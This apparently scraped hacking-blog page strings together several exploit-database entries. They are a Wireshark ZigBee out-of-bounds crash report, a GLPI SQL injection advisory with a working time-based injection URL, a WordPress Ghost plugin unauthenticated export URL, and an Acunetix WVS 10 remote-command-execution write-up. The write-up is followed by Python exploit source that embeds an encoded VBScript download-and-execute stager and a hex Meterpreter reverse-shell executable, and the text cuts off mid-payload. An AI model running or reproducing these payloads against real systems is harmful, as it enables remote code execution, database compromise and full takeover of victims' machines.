Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=806
The following crashes due to a static out-of-bounds memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==666==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fa5e68bd620 at pc 0x7fa5dc525eab bp 0x7ffd5938ec40 sp 0x7ffd5938ec38
READ of size 4 at 0x7fa5e68bd620 thread T0
#0 0x7fa5dc525eaa in dissect_zcl_pwr_prof_pwrprofnotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25
#1 0x7fa5dc512afc in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:10549:21
#2 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#3 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#4 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#5 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#6 0x7fa5dc4f777c in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:881:13
#7 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#8 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#9 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#10 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#11 0x7fa5dc4d0d60 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1705:9
#12 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#13 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#14 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#15 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#16 0x7fa5dc4d04fa in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1055:13
#17 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#18 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#19 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#20 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#21 0x7fa5dc4da910 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:732:9
#22 0x7fa5dc4d419a in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:762:9
#23 0x7fa5dc4d5fb7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:409:5
#24 0x7fa5d9d83bbb in dissector_try_heuristic wireshark/epan/packet.c:2390:7
#25 0x7fa5daf6591b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1524:21
#26 0x7fa5daf5756a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:751:5
#27 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#28 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#29 0x7fa5d9d7ad4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#30 0x7fa5dab8c105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
#31 0x7fa5d9d89911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#32 0x7fa5d9d7b57a in call_dissector_work wireshark/epan/packet.c:731:9
#33 0x7fa5d9d85a1e in call_dissector_only wireshark/epan/packet.c:2764:8
#34 0x7fa5d9d768ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#35 0x7fa5d9d75cd4 in dissect_record wireshark/epan/packet.c:539:3
#36 0x7fa5d9d28db9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#37 0x52ef3f in process_packet wireshark/tshark.c:3727:5
#38 0x52830c in load_cap_file wireshark/tshark.c:3483:11
#39 0x51e67c in main wireshark/tshark.c:2192:13
0x7fa5e68bd620 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:11520:13' (0x7fa5e68bd640) of size 128
0x7fa5e68bd620 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:10389:13' (0x7fa5e68bd5e0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:10832:25 in dissect_zcl_pwr_prof_pwrprofnotif
Shadow bytes around the buggy address:
0x0ff53cd0fa70: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x0ff53cd0fa80: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0ff53cd0fa90: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff53cd0faa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
0x0ff53cd0fab0: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 00 00
=>0x0ff53cd0fac0: 00 00 00 00[f9]f9 f9 f9 00 00 00 00 00 00 00 00
0x0ff53cd0fad0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9
0x0ff53cd0fae0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff53cd0faf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff53cd0fb00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff53cd0fb10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==666==ABORTING
--- cut ---
--- cut ---
==695==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7feb11013620 at pc 0x7feb06c7b825 bp 0x7ffd6fe96b00 sp 0x7ffd6fe96af8
READ of size 4 at 0x7feb11013620 thread T0
#0 0x7feb06c7b824 in dissect_zcl_pwr_prof_enphsschednotif wireshark/epan/dissectors/packet-zbee-zcl-general.c:10745:25
#1 0x7feb06c68ba8 in dissect_zbee_zcl_pwr_prof wireshark/epan/dissectors/packet-zbee-zcl-general.c:10563:21
#2 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#3 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#4 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#5 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#6 0x7feb06c4d77c in dissect_zbee_zcl wireshark/epan/dissectors/packet-zbee-zcl.c:881:13
#7 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#8 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#9 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#10 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#11 0x7feb06c26d60 in dissect_zbee_apf wireshark/epan/dissectors/packet-zbee-aps.c:1705:9
#12 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#13 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#14 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#15 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#16 0x7feb06c264fa in dissect_zbee_aps wireshark/epan/dissectors/packet-zbee-aps.c:1055:13
#17 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#18 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#19 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#20 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#21 0x7feb06c30910 in dissect_zbee_nwk_full wireshark/epan/dissectors/packet-zbee-nwk.c:732:9
#22 0x7feb06c2a19a in dissect_zbee_nwk wireshark/epan/dissectors/packet-zbee-nwk.c:762:9
#23 0x7feb06c2bfb7 in dissect_zbee_nwk_heur wireshark/epan/dissectors/packet-zbee-nwk.c:409:5
#24 0x7feb044d9bbb in dissector_try_heuristic wireshark/epan/packet.c:2390:7
#25 0x7feb056bb91b in dissect_ieee802154_common wireshark/epan/dissectors/packet-ieee802154.c:1524:21
#26 0x7feb056ad56a in dissect_ieee802154_nofcs wireshark/epan/dissectors/packet-ieee802154.c:751:5
#27 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#28 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#29 0x7feb044d0d4d in dissector_try_uint_new wireshark/epan/packet.c:1190:9
#30 0x7feb052e2105 in dissect_frame wireshark/epan/dissectors/packet-frame.c:492:11
#31 0x7feb044df911 in call_dissector_through_handle wireshark/epan/packet.c:656:8
#32 0x7feb044d157a in call_dissector_work wireshark/epan/packet.c:731:9
#33 0x7feb044dba1e in call_dissector_only wireshark/epan/packet.c:2764:8
#34 0x7feb044cc8ff in call_dissector_with_data wireshark/epan/packet.c:2777:8
#35 0x7feb044cbcd4 in dissect_record wireshark/epan/packet.c:539:3
#36 0x7feb0447edb9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
#37 0x52ef3f in process_packet wireshark/tshark.c:3727:5
#38 0x52830c in load_cap_file wireshark/tshark.c:3483:11
#39 0x51e67c in main wireshark/tshark.c:2192:13
0x7feb11013620 is located 32 bytes to the left of global variable 'ett_zbee_zcl_appl_ctrl_func' defined in 'packet-zbee-zcl-general.c:11520:13' (0x7feb11013640) of size 128
0x7feb11013620 is located 0 bytes to the right of global variable 'ett_zbee_zcl_pwr_prof_enphases' defined in 'packet-zbee-zcl-general.c:10389:13' (0x7feb110135e0) of size 64
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-zbee-zcl-general.c:10745:25 in dissect_zcl_pwr_prof_enphsschednotif
Shadow bytes around the buggy address:
0x0ffde21fa670: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x0ffde21fa680: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x0ffde21fa690: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffde21fa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
0x0ffde21fa6b0: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 00 00
=>0x0ffde21fa6c0: 00 00 00 00[f9]f9 f9 f9 00 00 00 00 00 00 00 00
0x0ffde21fa6d0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9
0x0ffde21fa6e0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffde21fa6f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffde21fa700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ffde21fa710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==695==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12358. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39750.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863125597
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Advisory ID: HTB23301
Product: GLPI
Vendor: INDEPNET
Vulnerable Version(s): 0.90.2 and probably prior
Tested Version: 0.90.2
Advisory Publication: April 8, 2016 [without technical details]
Vendor Notification: April 8, 2016
Vendor Patch: April 11, 2016
Public Disclosure: April 29, 2016
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a high-risk SQL injection vulnerability in a popular Information Resource Manager (IRM) system GLPI. IRM systems are usually used for management and audit of software packages, providing ITIL-compliant service desk. The vulnerability allows remote non-authenticated attacker to execute arbitrary SQL queries, read and write data to the application's database and completely compromise the vulnerable system.
The vulnerability exists due to insufficient filtration of user-supplied data passed via the "page_limit" HTTP GET parameter to "/ajax/getDropdownConnect.php" PHP script. A remote unauthenticated attacker can alter present SQL query, inject and execute arbitrary SQL command in application's database.
Below is a simple SQL Injection exploit, which uses time-based exploitation technique. The page will load time will be significantly higher if MySQL version is 5.X or superior:
http://[host]/ajax/getDropdownConnect.php?fromtype=Computer&itemtype=Com
puter&page=1&page_limit=1%20PROCEDURE%20analyse%28%28select%20extractval
ue%28rand%28%29,concat%280x3a,%28IF%28MID%28version%28%29,1,1%29%20LIKE%
205,%20BENCHMARK%285000000,SHA1%281%29%29,1%29%29%29%29%29,1%29
------------------------------------------------------------------------
-----------------------
Solution:
Update to GLPI 0.90.3
More Information:
http://www.glpi-project.org/spip.php?page=annonce&id_breve=358&lang=en
https://github.com/glpi-project/glpi/issues/581
------------------------------------------------------------------------
-----------------------
References:
[1] High-Tech Bridge Advisory HTB23301 - https://www.htbridge.com/advisory/HTB23301 - SQL Injection in GLPI.
[2] GLPI - http://www.glpi-project.org - GLPI is the Information Resource Manager with an additional Administration Interface.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
------------------------------------------------------------------------
-----------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
# Exploit Title: WordPress Export to Ghost Unrestricted Export Download
# Date: 28-04-2016
# Software Link: https://wordpress.org/plugins/ghost
# Exploit Author: Josh Brody
# Contact: http://twitter.com/joshmn
# Website: http://josh.mn/
# Category: webapps
1. Description
Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable.
2. Proof of Concept
http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file
File will be downloaded.
3. Solution:
Update to version 0.5.6
https://downloads.wordpress.org/plugin/ghost.0.5.6.zip
'''
Acunetix WVS 10 - Remote command execution (SYSTEM privilege)
- Author: Daniele Linguaglossa
Overview
=========
Acunetix WVS 10 [1] is an enterprise web vulnerability scanner developer by Acunetix Inc.
Two major flaws exists in the last version of Acunetix, these bug allow a remote attacker,
to execute command in the context of application with SYSTEM privilege.
Details
==========
A first flaw exists in the way Acunetix render some html elements inside gui, in fact it
uses jscript.dll without any concert about unsafe ActiveX object such as WScript.shell.
If acunetix trigger a vulnerability during a scan session it saves a local html with the
content of html page, so is possibile to trigger a fake vulnerability and insert a js
which trigger the remote command execution.
The second flaw it's about the Acunetix scheduler [2], the scheduler just allow to scan
websites programmatically without any user interaction, is possible to schedule scan
via the web interface on 127.0.0.1:8183 .
like any scan Acunetix, will perform some tests on the targeted Host before real scan,
these test are executed upon some script into folder
C:\ProgramData\Acunetix WVS 10\Data\Scripts
icacls show a bad privileges in this folder, so any user (even guest) will be able to
replace these custom checks with own ones (Remember first flaw with jscript.dll) :D
C:\ProgramData\Acunetix WVS 10\Data>icacls Scripts
Scripts Everyone:(OI)(CI)(M)
Everyone:(I)(OI)(CI)(M)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA) <---- UNSAFE [3]
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
C:\ProgramData\Acunetix WVS 10\Data>
With this two flaws in mind i wrote a small exploit which is able to obtain RCE via
a meterpreter shell, anyway there are some requirement:
1) Target must have VBS script interpreter
2) Target must have the scheduler service
3) Target must be Windows
Exploit
==========
https://github.com/dzonerzy/acunetix_0day
https://www.youtube.com/watch?v=gWcRlam59Fs (video proof)
Solution
==========
Jscript should be used with limited ActiveX, and permission on C:\ProgramData\Acunetix WVS 10\Data
must be fixed!
Footnotes
_________
[1] http://www.acunetix.com/
[2] http://www.acunetix.com/support/docs/wvs/scheduling-scans/
[3] https://support.microsoft.com/it-it/kb/919240
'''
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Acunetix 0day SYSTEM Remote Command Execution by Daniele Linguaglossa
This PoC exploit 2 vulnerability in Acunetix core , the first one is a RCE (Remote Command Exec) and the second one is
a LPE (Local Privilege Escalation).
All credits for this exploit goes to Daniele Linguaglossa
"""
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from random import randint
from threading import Thread
from time import sleep
import binascii
import sys
import base64
import os
server = None
def gen_random_name(size):
alphabet = "abcdefghilmnopqrstuvzABCDEFGHILMNOPQRSTUVZ0123456789"
name = ""
for i in range(0, size):
name += alphabet[randint(0, len(alphabet) - 1)]
return name + ".vbs"
def ip2b(ip):
return "".join(binascii.hexlify(chr(int(t))) for t in ip.split("."))
def postexploitation():
print "[*] Sleeping 1 minutes to elevate privileges...ZzZz"
sleep(70) # 2 minutes
global server
print "[!] Stopping server !"
server.shutdown()
print "[!] Exploit successful wait for session!"
# param URL,FILENAME
PAYLOAD_DOWNLOAD_EXEC = "dHNraWxsIHd2cw0KJGE9JycnDQogU2V0IGZzbyA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmpl" \
"Y3QiKQ0KIFNldCB3c2hTaGVsbCA9IENyZWF0ZU9iamVjdCggIldTY3JpcHQuU2hlbGwiICkNCiBTZXQgT3V0cCA9IFdz" \
"Y3JpcHQuU3Rkb3V0DQogU2V0IEZpbGUgPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiTWljcm9zb2Z0LlhNTEhUVFAiKQ0K" \
"IEZpbGUuT3BlbiAiR0VUIiwgImh0dHA6Ly8lcy9zdGFnZTIiLCBGYWxzZQ0KIE15RmlsZSA9IHdzaFNoZWxsLkV4cGFu" \
"ZEVudmlyb25tZW50U3RyaW5ncyggIiVzIiApKyJcJXMiDQogRmlsZS5TZW5kDQogU2V0IEJTID0gQ3JlYXRlT2JqZWN0" \
"KCJBRE9EQi5TdHJlYW0iKQ0KIEJTLnR5cGUgPSAxDQogQlMub3Blbg0KIEJTLldyaXRlIEZpbGUuUmVzcG9uc2VCb2R5" \
"DQogQlMuU2F2ZVRvRmlsZSBNeUZpbGUsIDINCiB3c2hTaGVsbC5ydW4gIndzY3JpcHQgIitNeUZpbGUNCiBmc28uRGVs" \
"ZXRlRmlsZShXc2NyaXB0LlNjcmlwdEZ1bGxOYW1lKQ0KICcnJw0KICRwdGggPSAoZ2V0LWl0ZW0gZW52OlRFTVApLlZh" \
"bHVlKyJcc3RhZ2VyLnZicyI7DQogZWNobyAkYSA+ICRwdGgNCiB3c2NyaXB0ICRwdGg="
# param connect back IP
PAYLOAD_METERPETRER = "4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000000000" \
"0000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6" \
"e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010300e4fb66ef000" \
"0000000000000e0000f030b01023800020000000e000000000000001000000010000000200000000040000010000000" \
"020000040000000100000004000000000000000040000000020000463a0000020000000000200000100000000010000" \
"0100000000000001000000000000000000000000030000064000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e7" \
"465787400000028000000001000000002000000020000000000000000000000000000200030602e64617461000000" \
"900a000000200000000c000000040000000000000000000000000000200030e02e6964617461000064000000003000" \
"000002000000100000000000000000000000000000400030c000000000000000000000000000000000b800204000ff" \
"e090ff253830400090900000000000000000ffffffff00000000ffffffff0000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" \
"0000000000000000000000000000000000000000000000000000000000000000000000009090909090909090909090" \
"90909090909090909090909090909090909033c0680810400064ff30648920fce8820000006089e531c0648b50308b" \
"520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b59" \
"2001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581" \
"c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89" \
"001000029c454506829806b00ffd56a0568%s680200115c89e6505050504050405068ea0fdfe0ffd5976a105657689" \
"9a57461ffd585c0740aff4e0875ece8610000006a006a0456576802d9c85fffd583f8007e368b366a4068001000005" \
"66a006858a453e5ffd593536a005653576802d9c85fffd583f8007d225868004000006a0050680b2f0f30ffd557687" \
"56e4d61ffd55e5eff0c24e971ffffff01c329c675c7c3bbf0b5a2566a0053ffd5190f4da8a063058eceb8f7b69074c" \
"4e814a3cae54e8172c60ead9604f2e86b0522895f543ebf148fad021d6146ace15f4ae3dbf55185e896fcaede21b0f" \
"db55831cbcfb72949f584986c13ebc8dd35971d7cee480354c83bf909ab61c53b4412733e4cd8dc788890915d41c0b" \
"2e06b529fe28c90a777a1a2ff95dc2a6bd697544d0462c01750e7f053c3ee2e1277d13515df7d3dc5ee57419630faf" \
"f6c066e12a8ef76cb84891bb64b347b905ceaea1850bc52542cb5a967d538e70d8e7c5335132befb4f87450a5ecdf2" \
"7ec89b1ed56e6beb044a950a8022ab5d46d5ba6f37655d35296ade2911292b5179f53d148dffee01672f90f1d82c22" \
"b5e253c2637ed99e71e796953a070483bb13cab540c00873b6f5788a1a6e58663cf9cf2ff46b92cbcdad9215a101fb" \
"54c71d2112151a19faec99fe5256fced9417f9673ddbb87439860eccedf31e528837cda1251b974f2808bdfc70cafa" \
"e32fb6335cdda22e19e64fde514b779dc932bb8249f8d8f260fd457b719980bb069a1ed560e2c74d85182c3aacd499" \
"df5dab0e0a0cee9e1da02cff7b89aac3f99de68badc83c9acf3c7518cf1578a58c131e1f3f36d393a7da0979f48115" \
"9d687cd9e3d5bc9fe3d34b9c7aa362be497402f21045d1aa7b871e773facc169649d8f64c0ac91d2feb85063169af8" \
"87973643f41f9b5c38b01cb2eb327e17d1d0f7f5e8693022c729f69b83723df61b9617f533cf919740edbb92ca86f9" \
"f1db8cdf696531559d41193f2356414df49a8e22790a7cb174079b5273c485e252296d690796649048410e29fc8a4d" \
"3d3384a98beb5bca12574510183cbaa49f1eee2e7712df55312a40c18e636efe4e7066034e50060e3dcfc5354dc9d9" \
"4b570a97d0b47eadc715effc165f9660797fc3ed75d5940262419d75ea5670a029774fa83b5818a7d46a9764de62be" \
"e019444d30589d5d778499aaa0b3d10e7897d26fc5e446eb358c7067df52636d8a2ba7340f40e0c263522bb494500d" \
"c73585ee9208e29ac7cdf591316712f1624116dc48ebe2c9fa5743e1e4519f82b8be65db56c09e6ef563286050decd" \
"f9b327481b045b2073ea4e52ba5c6bb066c2f02709effd1db019cba7b8b682f16749d12ca8c89230edbbecfd59bf51" \
"11ea1e6c9ed24ec62bcc37bff84195329a97a41354be5f297dd0edc868edbd35c528f79b9debf6a132b0ee1c140151" \
"a90f0c6145149b01e6f55b7e6cc24f015a0f98627fee12834bcf368458827c4c824b1968aa4df58188c5909a95df1f" \
"288c88326ee731d240159bba27397cc8b0fe4995ac6445a9033279af56f156d22416b8915f5b64a1acca60e4c1c6b8" \
"f33af7431ed674bd62b6b26613cad5f9c9d395c95ee9acc56aacd0f4ea4e198fb6e061d012c91ffa99ecdc1510099f" \
"8a4d4fc45273e6687be92c729b719692bb5e197083c4f4b77a1df988cd81141686743fe0e1ace050dec96c0fd8d75e" \
"7182ea3cfc0f13c5cf804a8264c67166495837b6da837bb7e382527f63db2f94c75af6c855162aeb3b8a2c362819b9" \
"b1d586db76faa0c06346149d2c88379cf186e36056669d4e7cc433cb8205dd0d058c2f6ae74111eeaa6a5883b14e74" \
"482d130a665e53b6e89020d600be481779ee7b97631b897608d6933c65fcfc4f630dabe2d0dbad0af7c614d81b679d" \
"619ce6a7eefbf94664a40e4772f540dc1964a979f4c25e125844c2a7075f6a6f5fae46dada35d3e83f82d03f87b11e" \
"cfb4bf6636d727cf99dae040b8dd3c7abcdb98eabb7e71b56348ce6a3c635299efebc81690288bbab0f6cad2ebfd2a" \
"a3d7aa74724b97be8ff3f360017970203ed71039a06799828f0455620fe432ef1dbb79cb87478c6d67e177fa72cbc0" \
"c1422a65197e33ee6a4b314992beb18cbaa3bcd00f43cc2749ed61c8d8cb38f512bee5bdb4d4574c0c56b91da064bd" \
"5c358dab92d2431b3c90938b4d0ec9661c2e9c98942585466ff7f0a7a5b5b56d825673b46966750cedce33eb0de118" \
"c5c4211b1bfc6d297d5d48205ac40a8f47b78988807fa9d312465c1c080b158c01267965e443de442716d3fe8ac029" \
"7640ef6d5632eaa784cf2b2b7a884d0589c93d69f8f8d7c6dc2b75a0825c0c5e892268cf3af3843004dc68dd05d367" \
"6ac0b218d9adc3ecca734fe7fa61de3272584ed349fffa669175cd8a873b72b7dce3cb4a8e8afa8ddbba2039219220" \
"6e9dc808a2ac3f2b6909e71321437b8979f26b9a8bda1fde661229544cb34ebc3ce7a4e0c05d340ba65457c67c3d61" \
"5d249af5d333ab3894045480fa8bb3b6c75a41ed9dd00ec8367c68cd41b2b03caa30fc527a00d94b3c25620813ac9d" \
"522e6e86cfee45a4f711171ec17f167abc0c4abb6c80de587bb790a1f83b9428d8380832a8216a6b8ea47cac624a24" \
"ca171c95ebb6d81bd7676eff464d56436d32b66bb3d190e44e66beb412bd7d5d8978d7e0e93bb0e9f08944a6c45b4a" \
"b5e493e0dd1491352d8078b0a3bae30bc2c145bc4e5f9dfd9b457d5dd8ff9c635031b02e7f3b8927b09460b983883a" \
"dbb42bdff6f8c017b5096ce7d5a72ab620504be21555aa86871ee9e4887657b8e72d8813b429428596839d00c3e44f" \
"fe5297ce95fc340278d1d805370c54f64615db34797f523f0a4cd2523d10d1a1b62146051db23668bc482d802b66bf" \
"962f511ec6af7204cbb8d474204bf5c9e52ce0cfbd6298cf96f619a5d64827ba3284b25135965a9062f3cd7eb93745" \
"390e9cc983c9a54ec731699bbda53958382cbb2e2ecd3247b18e5c3d64755c0d1e112e8375b5795afdfee8b69879c8" \
"6597f79b6df2624dbe59557e8d13918c2d28c91c3a4f49a8682b62648259d118ffa02b2218efa031b45fd54c0b8d14" \
"23d494b0a5da8e97ec345e17f9db32e9bec5cbcc36357b4ba8e7b8ccddc192d360d99a1e805dedc0ecadca15a0334f" \
"680b0a9e91e12698ba69d27d86b2394c3d91682194ba312e8aef801a9ebc8722af9e8bd1180c0eed3137bfe109b06c" \
"a442777eae4e1a145302152777da0a0a1decef0e0c73f2709cdb61360961eb1fc47cec9a893b9a8b2ec9f5a7fcce3e" \
"178b459a54d9c5e40c6aada77896a7ee9054324019fe61e954c60dfd7bc895011c951e09fc195e779b71fc33833cdb" \
"a5fe76ceb9a7b6ba5a39ed2e80c5d91b15cef0e1f5cb956b90e6db947fa45a4ae0e668b72a056dd29ea81c8b3aa126" \
"b35d40c6dfa042cbd19c42b7ef44e6ef7b35952dbc796097530a04a71a3c116e99bf4a4ae8199685cc7e1e9f03a1ce" \
